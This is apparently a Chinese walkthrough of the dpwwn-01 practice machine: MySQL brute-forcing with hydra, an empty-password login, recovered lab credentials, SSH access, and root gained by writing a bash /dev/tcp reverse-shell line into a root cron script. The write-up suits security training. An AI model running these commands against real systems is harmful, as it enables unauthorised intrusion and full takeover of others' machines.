dpwwn-01靶场复现

靶机发现:

dpwwn-01靶场复现_第1张图片

 端口扫描:

dpwwn-01靶场复现_第2张图片

 对3306端口进行爆破

hydra -l biaomei -P /home/biaomei/pass.txt  192.168.232.1180  -vV
 vV 显示爆破过程

dpwwn-01靶场复现_第3张图片

 此时没有一直爆破失败,查阅其他发现密码为空

3306弱口令登录

 dpwwn-01靶场复现_第4张图片

 查看数据库内容

dpwwn-01靶场复现_第5张图片

得到账号密码

 mistic
 testP@$$swordmistic

ssh登录

ssh [email protected]

dpwwn-01靶场复现_第6张图片

提权:

查看是否可以sudo 提权

dpwwn-01靶场复现_第7张图片

发现有使用root权限的定时任务

dpwwn-01靶场复现_第8张图片

 考虑使用反弹shell获取权限

更改logrot.sh文件内容

bash -i >& /dev/tcp/192.168.232.181/4444 0>&1

dpwwn-01靶场复现_第9张图片

 kali攻击机监听4444端口,并提权成功

dpwwn-01靶场复现_第10张图片

 获得flag

dpwwn-01靶场复现_第11张图片

 

你可能感兴趣的:(靶场复现,web安全)